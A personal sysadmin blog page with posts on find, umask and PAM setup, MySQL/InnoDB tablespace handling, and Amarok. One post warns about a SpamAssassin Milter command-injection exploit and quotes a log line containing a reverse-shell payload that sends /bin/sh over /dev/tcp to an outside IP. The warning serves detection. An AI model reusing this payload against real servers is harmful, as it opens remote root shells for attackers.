DM@Work

Monday, June 27, 2011

Performing more than one search in one pass of 'find'

find is a utility that searches a directory tree for files matching complex conditions. The conditions may include file name, file type, creation/modification time, owner, permissions and others. Besides, you can define an action to be performed on the files that match your search criteria.

When I have to run a number of searches, I usually do it sequentially, but the process may take too much time if the number of files find has to inspect is very large. It turns out that you can define multiple sets of conditions in find and perform different actions on files that match different conditions. The utility will traverse the directory only once.

This is how you can define multiple conditions and actions in one pass of find:

find /data \( ! -group mygroup -exec chgrp mygroup {} \; \) , \
                   \( -type f ! -perm -g=rw -exec chmod g+rw {} \; \) , \
                   \( -type d ! -perm -g=rws -exec chmod g+rws {} \; \)

This command will change group owner for all files that do not belong to mygroup, set read and write permissions for the owning group if the file is a regular file, set read, write and setgid permissions if the file is a directory. All in a single pass.

Wednesday, April 20, 2011

How to change default `umask' in Linux. File permissions for collaborative environment

Umask is a command and value that defines what permissions newly created files and directories will have. Had it not been for umask, every file you create would have had permissions set to 666 (u=rw,g=rw,o=rw), and every directory would have had 777 (u=rwx,g=rwx,o=rwx). But the value of umask is subtracted from 666 and the difference is used as the permissions for the new file. Usually, the default umask is 022, which leaves us with 644 (owner can read and write, others can read the file). The value of umask may be different for different users. This is done with the command of the same name (search for 'umask' in `man bash`).

Frankly, I find the choice of the default value for umask rather strange. Suppose you have a server where five people work on a web application and they have their own accounts. The code is stored in a version control system. These five people should have enough permissions to check out new code. When one of them adds a new file to the repository and then checks it out, the file belongs to this user and cannot be modified by the others. Solutions might be either to grant write permissions to everyone (chmod 666 filename) or to change the group ownership of the file to some group to which all five developers belong and grant write permissions to that group. The first solution is insecure. As for the second one, we can use a simple trick to maintain group ownership of all files in the project.

Among various permissions you can set with chmod there is one called setgid. When this bit is set on a directory, all files and directories created in this directory will have the same group ownership as this directory. So, we only have to grant write permissions to the group-owner in order to work in collaboration with other users. To grant the necessary permissions automatically, we could set the umask value to 002. This is done using simple command 'umask 002', but is there a way to set this as a default value for all users?

Umask may be modified in /etc/profile. For example, in Ubuntu Linux, this file contains the following line:


umask 022

By changing the value to 002, we'll change the umask for all users who log in using shells which execute /etc/profile. Watch out, though. There are some situations when this file is not run. For example, cron executes all commands using default umask 022. How do we tackle this problem?

Another way to change umask is to use PAM (Pluggable Authentication Modules), the subsystem for adding various features to login process. One of these modules is called pam_umask. It allows for setting default umask for all users. We have to enable this module for both interactive and non-interactive sessions. In Ubuntu, configuration files of PAM are stored in /etc/pam.d. Make sure you have module pam_umask installed (package libpam-modules) and edit two files, common-session and common-session-noninteractive, adding one line in the end of each of them:

session optional pam_umask.so umask=002

NB! If I understand correctly, you have to run pam-auth-update so PAM would reread the configuration.

CAVEAT 1: umask may be set in users' ~/.profile, so make sure it is not!

CAVEAT 2: There are some especially badly written programs that have umask hardcoded. Gnome is notorious for having such bugs (e.g., see bug #336214). My advice would be: do NOT use GDM or Nautilus. Or Gnome, or KDE, for that matter :).

So, to sum it up. To set up a collaborative environment, we have to:

create a new group: addgroup team
add users to this group: adduser user1 team
create new directory: mkdir /var/www/project
change group ownership for the directory: chgrp team /var/www/project
change the permissions for the directory: chmod g+sw /var/www/project
edit PAM config files, adding pam_umask.so.

Now, every file that user1 creates in /var/www/project will be writable for all users in the team

Pardon me for repeating myself, but I do find the default value of umask unreasonable. 022 is often explained by security concerns, but it does not allow the group members to edit the file, but instead grants read rights to everyone! I could understand, say, 027, which bans read access to those outside the group, or 002, which grants write access to the group. Perhaps, 007 would be a good compromise.

Monday, February 14, 2011

Vulnerability in Spamassassin milter plugin

Owners of sendmail/postfix with the Spamassassin Milter plugin, watch out! Exploit is in the wild:
Spamassassin Milter Plugin Remote Root,
SpamAssassin Milter Plugin 'mlfi_envrcpt()' Remote Arbitrary Command Injection Vulnerability,
ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt.

Check your logs for mail like this:


Feb 13 20:31:55 host sm-mta[21734]: p1DHVtxv021734: from=blue@dick.com, size=0, class=0, nrcpts=0, proto=SMTP, daemon=MTA-v4, relay=eluxenia.com [62.149.195.3]

If the system is not vulnerable, sendmail would reply with:


Feb 13 20:31:55 host sm-mta[21734]: p1DHVtxv021734: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"... Cannot mail directly to programs

At least, this is what my sendmail reported.

Monday, December 20, 2010

SOLVED: Moving InnoDB tables between Percona MySQL servers

Update. Warning: The procedure is not working. The table can be copied, imported into another server and successfully read, but an attempt to write to the table causes a server crash. The problem is probably caused by remaining tablespace ids in the ibd file.

Update 2. Kudos to the Percona team, who pointed me to an error in my configuration file. To import tablespaces, one more option had to be set on the server, innodb_expand_import. Xtrabackup documentation has been updated.

When trying to move a table from one server to another, I found a problem. I followed the procedures outlined in the Percona Xtrabackup manual, chapter Exporting Tables.

On the last step, when doing IMPORT TABLE, I received an error message saying:

mysql> alter table `document_entity_bodies` import tablespace;
ERROR 1030 (HY000): Got error -1 from storage engine

There was some more information in the log:

101220 16:14:51  InnoDB: Error: tablespace id and flags in file './dbx_replica/document_entity_bodies.ibd'
 are 21 and 0, but in the InnoDB
InnoDB: data dictionary they are 181 and 0.
InnoDB: Have you moved InnoDB .ibd files around without using the
InnoDB: commands DISCARD TABLESPACE and IMPORT TABLESPACE?
InnoDB: Please refer to
InnoDB: http://dev.mysql.com/doc/refman/5.1/en/innodb-troubleshooting-datadict.html
InnoDB: for how to resolve the issue.
101220 16:14:51  InnoDB: cannot find or open in the database directory the .ibd file of
InnoDB: table `dbx_replica`.`document_entity_bodies`
InnoDB: in ALTER TABLE ... IMPORT TABLESPACE

The page mentioned in the log was not really helpful. What saved me was this article: Recovering an InnoDB table from only an .ibd file.

Following the instructions, I used a hex editor (shed) to change tablespace id in the ibd file from 0x15 to 0xB5 and then the import worked fine.

I wonder if there is a way to avoid these manipulations. Perhaps, one more operation should be added to xtrabackup to make the tablespace ids agree?

Oh, and it's Xtrabackup 1.4 working with Percona Server 5.1.51

Wednesday, December 15, 2010

Amarok without panels and trays

What's the use of “desktop” ornamentation like panels and trays? Time of day, CPU load, WiFi status — I can't think of anything I would like to see every moment I spend at the keyboard. If I want to know what's the time, I press 'M-z a'. So, panels and trays do not occupy a single pixel on my display.

Some programs, though, have a strange habit of closing their main window and leaving only a small icon in the tray. And there's no other way to control them besides grabbing the mouse and clicking, clicking, clicking... In some cases, though, you can leave your mouse in the dust. Amarok is one of such cases. I was perplexed when I saw Amarok in the list of processes, but there was no main window anywhere. Unfortunately, Amarok uses one of those recent abominations that appeared in Linux, DBus. To show the main window, send a signal using `qdbus':

$ qdbus org.kde.amarok /amarok/MainWindow org.kde.amarok.MainWindow.showHide

Friday, November 19, 2010

MySQL: enable innodb_file_per_table with zero downtime

I thought that while my wife is preoccupied with the lemon pie, I might tell you this story.

InnoDB is a very good storage engine for MySQL that combines reasonable performance with wide popularity and, as a consequence, a good set of tools for diagnostics and fine-tuning. One of its downsides is that it is inefficient when it comes to the disk space management. While an extent of HDD space was added to the storage, InnoDB will not return it back even when you delete tables or databases. To add some flexibility, you should use innodb_file_per_table option. Unfortunately, if you have a running database, you cannot just enable this option. You will have to make a dump of the database and restore it on a new instance of MySQL with the option enabled from the very beginning. This scenario means that the database will be inaccessible from the moment you start mysqldump to the moment you finish restoring the data in the new instance. Is there a way to minimize the downtime?

Yes, you can run mysqldump on a backup of your database. But, then you lose the data written to the database from the moment you make the backup to the moment the new instance is ready. But that's a bit closer to the solution. You can also set up replication between the original database and the new one and then, when the new instance catches up with the old one, your task is completed. And the backup can be done online, without stopping MySQL, if you use Xtrabackup tool by Percona.

So, the basic steps you have to follow are:

Configure your original database as master. Unless your database is already using binlogs for security, this is the only step that will require restarting MySQL.
Make a backup of the original database using Xtrabackup.
Restore the backup and run a second instance of MySQL.
Run mysqldump on the second instance.
Stop the second instance, but do not delete it yet.
Create a new database and start the third instance of MySQL with the enabled option innodb_file_per_table.
Restore the dump by feeding it into the third instance of MySQL.
Configure the third instance as slave and run the replication.
When the initial replication finishes and the slave catches up with the master, reconfigure your clients to use the new instance.
That's it. You can stop the first instance now and delete it.

I wrote an even more detailed guide illustrated with example commands. It was published on Linux.com recently: HOWTO: Reconfigure MySQL to use innodb_file_per_table with zero downtime

Friday, November 12, 2010

How not to write scripts

Today, I've seen a PHP script that used 41.5 Gb of virtual memory. 26 of them were carefully put to the swap. And I recalled the programs we were writing only 15-20 years ago. Like, a text editor that could process gigabyte text files (in theory, because there were no disk drives to store such files). Or a graphic viewer that could show pictures ten times larger than the amount of available RAM.

As a friend of mine has put it, in the USSR, when the engineers were sent to kolkhoz to gather in the crop of potato, they knew what might happen to them if they didn't work well. Wish some of modern developers knew that, too.